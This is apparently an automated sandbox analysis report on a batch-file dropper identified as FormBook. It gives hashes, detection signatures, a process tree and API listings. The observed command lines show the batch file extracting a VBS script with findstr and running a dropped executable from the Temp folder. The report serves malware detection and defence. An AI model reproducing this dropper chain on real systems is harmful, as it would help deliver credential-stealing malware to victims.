Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FS001_ DT103024.bat

Overview

General Information

Sample name:FS001_ DT103024.bat
Analysis ID:1546702
MD5:3f526171c5f8abe5b38acc03f002c6e9
SHA1:f89f1f5961f3dd53cd76471d7603ae9bfc1fa0c1
SHA256:ba8888302e61b64da91ce078b99ee2c4afa90f53621f9005be2ffbe7bdde1767
Tags:bat
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Command shell drops VBS files
Found large BAT file
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2972 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FS001_ DT103024.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • findstr.exe (PID: 2780 cmdline: findstr /e "'v" "C:\Users\user\Desktop\FS001_ DT103024.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cscript.exe (PID: 6676 cmdline: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • x.exe (PID: 6728 cmdline: C:\Users\user\AppData\Local\Temp\x.exe MD5: 431187D149215C1A9B535B0B25EE1FC1)
      • x.exe (PID: 1628 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 431187D149215C1A9B535B0B25EE1FC1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2389064110.0000000001340000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      Process Memory Space: x.exe PID: 6728JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.2.x.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          7.2.x.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Script Interpreter Execution From Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FS001_ DT103024.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2972, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 6676, ProcessName: cscript.exe
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FS001_ DT103024.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2972, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 6676, ProcessName: cscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FS001_ DT103024.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2972, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 6676, ProcessName: cscript.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FS001_ DT103024.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2972, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs, ProcessId: 6676, ProcessName: cscript.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-01T13:54:22.401728+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549707TCP
            2024-11-01T13:54:52.492455+010020229301A Network Trojan was detected4.245.163.56443192.168.2.561507TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 54%
            Multi AV Scanner detection for submitted file
            Source: FS001_ DT103024.batReversingLabs: Detection: 45%
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.x.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2389064110.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
            Source: Binary string: wntdll.pdbUGP source: x.exe, 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: x.exe, x.exe, 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp

            Networking

            barindex
            Potential malicious VBS script found (has network functionality)
            Source: C:\Windows\System32\cmd.exeDropped file: b.SaveToFile p+"\x.exe",2'vJump to dropped file
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49707
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:61507

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.x.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2389064110.0000000001340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2388569618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Found large BAT file
            Source: FS001_ DT103024.batStatic file information: 1405358
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0042C653 NtClose,7_2_0042C653
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014135C0 NtCreateMutant,LdrInitializeThunk,7_2_014135C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_01412DF0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_01412C70
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01413010 NtOpenDirectoryObject,7_2_01413010
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01413090 NtSetValueKey,7_2_01413090
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01414340 NtSetContextThread,7_2_01414340
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01414650 NtSuspendThread,7_2_01414650
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014139B0 NtGetContextThread,7_2_014139B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412B60 NtClose,7_2_01412B60
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412BE0 NtQueryValueKey,7_2_01412BE0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412BF0 NtAllocateVirtualMemory,7_2_01412BF0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412B80 NtQueryInformationFile,7_2_01412B80
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412BA0 NtEnumerateValueKey,7_2_01412BA0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412AD0 NtReadFile,7_2_01412AD0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412AF0 NtWriteFile,7_2_01412AF0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412AB0 NtWaitForSingleObject,7_2_01412AB0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01413D70 NtOpenThread,7_2_01413D70
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412D00 NtSetInformationFile,7_2_01412D00
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412D10 NtMapViewOfSection,7_2_01412D10
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01413D10 NtOpenProcessToken,7_2_01413D10
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412D30 NtUnmapViewOfSection,7_2_01412D30
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412DD0 NtDelayExecution,7_2_01412DD0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412DB0 NtEnumerateKey,7_2_01412DB0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412C60 NtCreateKey,7_2_01412C60
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412C00 NtQueryInformationProcess,7_2_01412C00
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412CC0 NtQueryVirtualMemory,7_2_01412CC0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412CF0 NtOpenProcess,7_2_01412CF0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412CA0 NtQueryInformationToken,7_2_01412CA0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412F60 NtCreateProcessEx,7_2_01412F60
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412F30 NtCreateSection,7_2_01412F30
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412FE0 NtCreateFile,7_2_01412FE0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412F90 NtProtectVirtualMemory,7_2_01412F90
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412FA0 NtQuerySection,7_2_01412FA0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412FB0 NtResumeThread,7_2_01412FB0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412E30 NtWriteVirtualMemory,7_2_01412E30
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412EE0 NtQueueApcThread,7_2_01412EE0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412E80 NtReadVirtualMemory,7_2_01412E80
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01412EA0 NtAdjustPrivilegesToken,7_2_01412EA0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_01193E345_2_01193E34
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0119E04C5_2_0119E04C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0119703A5_2_0119703A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F6AEF85_2_06F6AEF8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F621B05_2_06F621B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F6B6B85_2_06F6B6B8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F623F05_2_06F623F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F823385_2_06F82338
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F810695_2_06F81069
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8918A5_2_06F8918A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8C6405_2_06F8C640
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8C6305_2_06F8C630
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F856105_2_06F85610
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F856035_2_06F85603
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F845F05_2_06F845F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F875885_2_06F87588
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8E2905_2_06F8E290
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8E27F5_2_06F8E27F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8C2085_2_06F8C208
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8C1F95_2_06F8C1F9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8BDD05_2_06F8BDD0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8BDB15_2_06F8BDB1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8EA055_2_06F8EA05
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8D8E05_2_06F8D8E0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8D8D15_2_06F8D8D1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F858A85_2_06F858A8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F858975_2_06F85897
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F9E7E05_2_06F9E7E0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F921065_2_06F92106
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F96CE85_2_06F96CE8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F96CD85_2_06F96CD8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F92C385_2_06F92C38
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F98C005_2_06F98C00
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_07D700405_2_07D70040
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_07D719A85_2_07D719A8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_07D72CB85_2_07D72CB8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_004100437_2_00410043
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0041694E7_2_0041694E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_004169537_2_00416953
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00402A457_2_00402A45
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_004012507_2_00401250
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00402A507_2_00402A50
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_004102637_2_00410263
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0040E2E37_2_0040E2E3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0042EC837_2_0042EC83
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_004026A07_2_004026A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00402FA07_2_00402FA0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014AB16B7_2_014AB16B
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0141516C7_2_0141516C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D01007_2_013D0100
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CF1727_2_013CF172
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147A1187_2_0147A118
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014981CC7_2_014981CC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EB1B07_2_013EB1B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A01AA7_2_014A01AA
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148F0CC7_2_0148F0CC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014970E97_2_014970E9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149F0E07_2_0149F0E0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E70C07_2_013E70C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149A3527_2_0149A352
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149132D7_2_0149132D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013CD34C7_2_013CD34C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A03E67_2_014A03E6
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EE3F07_2_013EE3F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0142739A7_2_0142739A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014802747_2_01480274
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E52A07_2_013E52A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014812ED7_2_014812ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FB2C07_2_013FB2C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E05357_2_013E0535
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014975717_2_01497571
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014A05917_2_014A0591
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147D5B07_2_0147D5B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014924467_2_01492446
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D14607_2_013D1460
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149F43F7_2_0149F43F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148E4F67_2_0148E4F6
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014047507_2_01404750
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E07707_2_013E0770
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149F7B07_2_0149F7B0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DC7C07_2_013DC7C0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014916CC7_2_014916CC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FC6E07_2_013FC6E0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F69627_2_013F6962
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E99507_2_013E9950
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FB9507_2_013FB950
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E29A07_2_013E29A0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_014AA9A67_2_014AA9A6
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0144D8007_2_0144D800
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EA8407_2_013EA840
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E28407_2_013E2840
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013C68B87_2_013C68B8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0140E8F07_2_0140E8F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E38E07_2_013E38E0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149AB407_2_0149AB40
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149FB767_2_0149FB76
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01496BD77_2_01496BD7
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01455BF07_2_01455BF0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0141DBF97_2_0141DBF9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013A9B807_2_013A9B80
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FFB807_2_013FFB80
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149FA497_2_0149FA49
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01497A467_2_01497A46
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01453A6C7_2_01453A6C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0148DAC67_2_0148DAC6
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DEA807_2_013DEA80
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01425AA07_2_01425AA0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0147DAAC7_2_0147DAAC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01491D5A7_2_01491D5A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01497D737_2_01497D73
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013EAD007_2_013EAD00
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E3D407_2_013E3D40
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F8DBF7_2_013F8DBF
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013DADE07_2_013DADE0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013FFDC07_2_013FFDC0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E0C007_2_013E0C00
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01459C327_2_01459C32
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149FCF27_2_0149FCF2
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D0CF27_2_013D0CF2
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01480CB57_2_01480CB5
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01454F407_2_01454F40
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149FF097_2_0149FF09
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01422F287_2_01422F28
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_01400F307_2_01400F30
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E1F927_2_013E1F92
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013ECFE07_2_013ECFE0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013A3FD27_2_013A3FD2
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013A3FD57_2_013A3FD5
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D2FC87_2_013D2FC8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149FFB17_2_0149FFB1
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E0E597_2_013E0E59
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149EE267_2_0149EE26
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013E9EB07_2_013E9EB0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149EEDB7_2_0149EEDB
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013F2E907_2_013F2E90
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0149CE937_2_0149CE93
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 0145F290 appears 105 times
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 013CB970 appears 268 times
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 01427E54 appears 90 times
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 0144EA12 appears 86 times
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 01415130 appears 36 times
            Source: x.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 5.2.x.exe.45517f0.2.raw.unpack, dMn7Q7mEsppOh0xjvJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, dMn7Q7mEsppOh0xjvJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csSecurity API names: _0020.SetAccessControl
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csSecurity API names: _0020.AddAccessRule
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csSecurity API names: _0020.SetAccessControl
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
